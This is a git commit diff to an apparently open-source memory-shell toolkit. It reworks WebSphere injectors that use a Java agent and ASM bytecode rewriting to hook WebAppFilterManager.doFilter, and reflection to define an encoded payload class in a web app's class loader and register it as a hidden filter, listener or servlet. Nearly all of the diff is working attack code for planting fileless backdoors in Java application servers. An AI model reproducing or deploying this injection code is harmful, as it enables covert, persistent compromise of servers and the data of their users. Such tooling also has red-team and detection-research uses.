fix

ReaJason · ReaJason · commit 5851aaf0d3b4 · 2025-05-22T02:28:08.000+08:00
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereFilterChainAgentInjector.java b/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereFilterChainAgentInjector.java
@@ -19,9 +19,6 @@
 public class WebSphereFilterChainAgentInjector implements ClassFileTransformer {
     private static final String TARGET_CLASS = "com/ibm/ws/webcontainer/filter/WebAppFilterManager";
     private static final String TARGET_METHOD_NAME = "doFilter";
-    private static Class<?> payload;
-    private static ClassLoader targetClassLoader;
-    private static String thisClassName = WebSphereFilterChainAgentInjector.class.getName();
 
     public static String getClassName() {
         return "{{advisorName}}";
@@ -39,38 +36,24 @@ public static void agentmain(String args, Instrumentation inst) throws Exception
         launch(inst);
     }
 
-
-    @Override
-    public boolean equals(Object obj) {
-        if (payload == null) {
-            payload = new AgentShellClassLoader(targetClassLoader).defineDynamicClass(gzipDecompress(decodeBase64(getBase64String())));
-        }
-        try {
-            return payload.newInstance().equals(obj);
-        } catch (Throwable e) {
-            e.printStackTrace();
-            return false;
-        }
-    }
-
     private static void launch(Instrumentation inst) throws Exception {
         System.out.println("MemShell Agent is starting");
         inst.addTransformer(new WebSphereFilterChainAgentInjector(), true);
         for (Class<?> allLoadedClass : inst.getAllLoadedClasses()) {
             String name = allLoadedClass.getName();
             if (TARGET_CLASS.replace("/", ".").equals(name)) {
                 inst.retransformClasses(allLoadedClass);
+                System.out.println("MemShell Agent is working at com.ibm.ws.webcontainer.filter.WebAppFilterManager.doFilter");
             }
         }
-        System.out.println("MemShell Agent is working at com.ibm.ws.webcontainer.filter.WebAppFilterManager.doFilter");
     }
 
     @Override
     @SuppressWarnings("all")
     public byte[] transform(final ClassLoader loader, String className, Class<?> classBeingRedefined,
                             ProtectionDomain protectionDomain, byte[] bytes) {
         if (TARGET_CLASS.equals(className)) {
-            targetClassLoader = loader;
+            defineTargetClass(loader);
             try {
                 ClassReader cr = new ClassReader(bytes);
                 ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS | ClassWriter.COMPUTE_FRAMES) {
@@ -99,7 +82,7 @@ public MethodVisitor visitMethod(int access, String name, String descriptor,
                 if (TARGET_METHOD_NAME.equals(name)) {
                     try {
                         Type[] argumentTypes = Type.getArgumentTypes(descriptor);
-                        return new AgentShellMethodVisitor(mv, argumentTypes, thisClassName);
+                        return new AgentShellMethodVisitor(mv, argumentTypes, getClassName());
                     } catch (Exception e) {
                         e.printStackTrace();
                     }
@@ -130,23 +113,10 @@ public void visitCode() {
             mv.visitTryCatchBlock(tryStart, tryEnd, catchHandler, "java/lang/Throwable");
 
             mv.visitLabel(tryStart);
-            mv.visitLdcInsn(className);
-            mv.visitInsn(Opcodes.ICONST_1);
-            mv.visitMethodInsn(Opcodes.INVOKESTATIC,
-                    "java/lang/ClassLoader",
-                    "getSystemClassLoader",
-                    "()Ljava/lang/ClassLoader;",
-                    false);
-            mv.visitMethodInsn(Opcodes.INVOKESTATIC,
-                    "java/lang/Class",
-                    "forName",
-                    "(Ljava/lang/String;ZLjava/lang/ClassLoader;)Ljava/lang/Class;",
-                    false);
-            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL,
-                    "java/lang/Class",
-                    "newInstance",
-                    "()Ljava/lang/Object;",
-                    false);
+            String internalClassName = className.replace('.', '/');
+            mv.visitTypeInsn(Opcodes.NEW, internalClassName);
+            mv.visitInsn(Opcodes.DUP);
+            mv.visitMethodInsn(Opcodes.INVOKESPECIAL, internalClassName, "<init>", "()V", false);
             mv.visitInsn(Opcodes.SWAP);
             mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL,
                     "java/lang/Object",
@@ -196,85 +166,6 @@ private int getArgIndex(final int arg) {
         }
     }
 
-    public static class AgentShellClassLoader extends URLClassLoader {
-        private final ClassLoader targetClassLoader;
-
-        public AgentShellClassLoader(ClassLoader targetClassLoader) {
-            super(new URL[0], ClassLoader.getSystemClassLoader());
-            this.targetClassLoader = targetClassLoader;
-        }
-
-        @SuppressWarnings("all")
-        private Object getClassLoadingLock0(String className) {
-            try {
-                return getClassLoadingLock(className);
-            } catch (Throwable t) {
-                return this;
-            }
-        }
-
-        public Class<?> defineDynamicClass(byte[] bytes) {
-            return defineClass(bytes, 0, bytes.length);
-        }
-
-        @Override
-        protected Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
-            Class<?> clazz = null;
-            if (name == null || name.startsWith("java.")) {
-                clazz = getParent().loadClass(name);
-            } else {
-                try {
-                    clazz = findLoadedClass(name);
-                    if (clazz == null) {
-                        synchronized (getClassLoadingLock0(name)) {
-                            clazz = findLoadedClass(name);
-                            if (clazz == null) {
-                                clazz = findClass(name);
-                            }
-                        }
-                    }
-                } catch (Throwable ignored) {
-                }
-                try {
-                    if (clazz == null) {
-                        clazz = getParent().loadClass(name);
-                    }
-                } catch (ClassNotFoundException e) {
-                    try {
-                        clazz = tryToLoadByContextClassLoader(name, resolve);
-                    } catch (Throwable ignored) {
-                        throw e;
-                    }
-                }
-            }
-
-            if (resolve) {
-                resolveClass(clazz);
-            }
-            return clazz;
-        }
-
-        public Class<?> tryToLoadByContextClassLoader(String name, boolean resolve) throws ClassNotFoundException {
-            if (targetClassLoader != null) {
-                Class<?> clazz = targetClassLoader.loadClass(name);
-                if (resolve) {
-                    resolveClass(clazz);
-                }
-                return clazz;
-            }
-            ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
-            if (contextClassLoader != null) {
-                Class<?> clazz = contextClassLoader.loadClass(name);
-                if (resolve) {
-                    resolveClass(clazz);
-                }
-                return clazz;
-            } else {
-                return null;
-            }
-        }
-    }
-
     @SuppressWarnings("all")
     public static byte[] decodeBase64(String base64Str) {
         Class<?> decoderClass;
@@ -316,4 +207,20 @@ public static byte[] gzipDecompress(byte[] compressedData) {
             }
         }
     }
+
+    @SuppressWarnings("all")
+    public void defineTargetClass(ClassLoader loader) {
+        try {
+            loader.loadClass(getClassName());
+            return;
+        } catch (ClassNotFoundException ignored) {
+        }
+        byte[] classBytecode = gzipDecompress(decodeBase64(getBase64String()));
+        try {
+            java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+            defineClass.setAccessible(true);
+            defineClass.invoke(loader, classBytecode, 0, classBytecode.length);
+        } catch (Exception ignored) {
+        }
+    }
 }
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereFilterInjector.java b/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereFilterInjector.java
@@ -48,7 +48,10 @@ public String getBase64String() throws IOException {
         return "{{base64Str}}";
     }
 
-
+    /**
+     * com.ibm.ws.webcontainer.webapp.WebAppImpl
+     * /opt/IBM/WebSphere/AppServer/plugins/com.ibm.ws.webcontainer.jar
+     */
     public List<Object> getContext() throws Exception {
         List<Object> contexts = new ArrayList<Object>();
         Object context;
@@ -75,12 +78,17 @@ public List<Object> getContext() throws Exception {
         return contexts;
     }
 
+    private ClassLoader getWebAppClassLoader(Object context) throws Exception {
+        try {
+            return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
+        } catch (Exception e) {
+            return ((ClassLoader) getFieldValue(context, "loader"));
+        }
+    }
+
     @SuppressWarnings("all")
     private Object getShell(Object context) throws Exception {
-        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
-        if (classLoader == null) {
-            classLoader = context.getClass().getClassLoader();
-        }
+        ClassLoader classLoader = getWebAppClassLoader(context);
         try {
             return classLoader.loadClass(getClassName()).newInstance();
         } catch (Exception e) {
@@ -100,21 +108,10 @@ public void inject(Object context, Object filter) throws Exception {
             return;
         }
 
-        Class<?> filterMappingClass;
-        Class<?> iFilterConfigClass;
-        Class<?> iServletConfigClass;
-        ClassLoader classLoader;
-        try {
-            classLoader = context.getClass().getClassLoader();
-            filterMappingClass = classLoader.loadClass("com.ibm.ws.webcontainer.filter.FilterMapping");
-            iFilterConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.filter.IFilterConfig");
-            iServletConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.servlet.IServletConfig");
-        } catch (Exception e) {
-            classLoader = Thread.currentThread().getContextClassLoader();
-            filterMappingClass = classLoader.loadClass("com.ibm.ws.webcontainer.filter.FilterMapping");
-            iFilterConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.filter.IFilterConfig");
-            iServletConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.servlet.IServletConfig");
-        }
+        ClassLoader classLoader = context.getClass().getClassLoader();
+        Class<?> filterMappingClass = classLoader.loadClass("com.ibm.ws.webcontainer.filter.FilterMapping");
+        Class<?> iFilterConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.filter.IFilterConfig");
+        Class<?> iServletConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.servlet.IServletConfig");
 
         Object filterManager = getFieldValue(context, "filterManager");
         try {
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereListenerInjector.java b/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereListenerInjector.java
@@ -64,12 +64,17 @@ public List<Object> getContext() throws Exception {
         return contexts;
     }
 
+    private ClassLoader getWebAppClassLoader(Object context) throws Exception {
+        try {
+            return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
+        } catch (Exception e) {
+            return ((ClassLoader) getFieldValue(context, "loader"));
+        }
+    }
+
     @SuppressWarnings("all")
     private Object getShell(Object context) throws Exception {
-        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
-        if (classLoader == null) {
-            classLoader = context.getClass().getClassLoader();
-        }
+        ClassLoader classLoader = getWebAppClassLoader(context);
         try {
             return classLoader.loadClass(getClassName()).newInstance();
         } catch (Exception e) {
@@ -142,4 +147,27 @@ public static Object getFieldValue(Object obj, String name) throws NoSuchFieldEx
         }
         throw new NoSuchFieldException(name);
     }
+
+    @SuppressWarnings("all")
+    public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws
+            Exception {
+        Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
+        Method method = null;
+        while (clazz != null && method == null) {
+            try {
+                if (paramClazz == null) {
+                    method = clazz.getDeclaredMethod(methodName);
+                } else {
+                    method = clazz.getDeclaredMethod(methodName, paramClazz);
+                }
+            } catch (NoSuchMethodException e) {
+                clazz = clazz.getSuperclass();
+            }
+        }
+        if (method == null) {
+            throw new NoSuchMethodException("Method not found: " + methodName);
+        }
+        method.setAccessible(true);
+        return method.invoke(obj instanceof Class ? null : obj, param);
+    }
 }
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereServletInjector.java b/memshell/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereServletInjector.java
@@ -70,12 +70,17 @@ public List<Object> getContext() throws Exception {
         return contexts;
     }
 
+    private ClassLoader getWebAppClassLoader(Object context) throws Exception {
+        try {
+            return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
+        } catch (Exception e) {
+            return ((ClassLoader) getFieldValue(context, "loader"));
+        }
+    }
+
     @SuppressWarnings("all")
     private Object getShell(Object context) throws Exception {
-        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
-        if (classLoader == null) {
-            classLoader = context.getClass().getClassLoader();
-        }
+        ClassLoader classLoader = getWebAppClassLoader(context);
         try {
             return classLoader.loadClass(getClassName()).newInstance();
         } catch (Exception e) {
@@ -94,7 +99,7 @@ public void inject(Object context, Object servlet) throws Exception {
             System.out.println("servlet already injected");
             return;
         }
-        invokeMethod(context, "addDynamicServlet", new Class[]{String.class, String.class, String.class, Properties.class}, new Object[]{getClassName(), servlet.getClass().getName(), getUrlPattern(), null});
+        invokeMethod(context, "addDynamicServlet", new Class[]{String.class, String.class, String.class, Properties.class}, new Object[]{getClassName(), getClassName(), getUrlPattern(), null});
         System.out.println("servlet injected successfully");
     }
 
